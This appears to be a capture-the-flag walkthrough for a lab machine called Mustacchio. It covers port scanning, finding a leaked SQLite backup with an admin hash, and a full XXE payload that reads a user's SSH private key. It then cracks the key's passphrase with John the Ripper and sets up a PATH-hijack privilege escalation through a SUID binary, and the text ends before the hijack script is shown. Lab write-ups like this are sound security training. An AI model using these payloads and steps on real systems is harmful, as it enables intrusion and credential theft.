Start by running Nmap on all ports. We then find that SSH is open, a website on port 80 and a admin login page at port 8765.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
| 256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_ 256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gobuster
Next, I ran Gobuster which found the directory /custom. In that folder we find a file called users.bak.
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php, txt" | tee gobuster.log
SQLite3
Once the users.bak is downloaded, we can see that it is a SQLite database.
file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2
It can be opened with the command sqlite3 users.bak and we can view the content as such:
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
Cracking the admin password
Login to the admin page
Once we have the credentials, we can use them to login to the admin page a port 8765. At this page we can "Add a comment on the website". If we inspect the Source code of the site we find the following.
<script type="text/javascript">
//document.cookie = "Example=/auth/dontforget.bak";
function checktarea() {
let tbox = document.getElementById("box").value;
if (tbox == null || tbox.length == 0) {
alert("Insert XML Code!")
}
}
</script>
</head>
<body>
<!-- Barry, you can now SSH in using your key!-->
This gives us three pieces of valuable information
Someone called Barry can login with his SSH
We must perform an XXE attack as we can pass XML to the submit form.
The path /auth/dontforget.bak looks interesting
If we start from the bottom, we can download the dontforget.bak file and view its content using the cat command.
cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
This gives us the basic XML form we need to provide. We can combine it with a XXE payload to view the id_rsa key of Barry.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
id_rsa
Once the id_rsa is obtained we can try to login with SSH as Barry - remember to modify the permissions of the key chmod 600 id_rsa
ssh barry@$IP -i id_rsa
However, we are prompted for a password which is not the same we used to login to the admin page.
Obtain the password with John
We can use ssh2john and JohnTheRipper to crack the password.
First, convert the key to right format then use John to crack it.
ssh2john id_rsa > barryhash
john barryhash --wordlist=/usr/share/wordlists/rockyou.txt
Get first flag
Once we have logged in a Barry, we can get the first flag by viewing the file /home/barry/user.txt
Get root
Now, we start by looking SUIDs with the command find / -perm -u=s -type f 2>/dev/null
which shows us that we can execute /home/joe/live_log as root.
If we use strings on that file, we find this interesting snippet.
tail -f /var/log/nginx/access.log
This seems to be a command that is executed. The proper way of doing this is probally some reverse engineering, but since we kinda know what to look for this is sufficient.
Let's try to create a custom tail binary and try to hijack the path. The content of tail should look like this. A Bash script that will copy /bin/bash to the /tmp folder and set the correct privileges.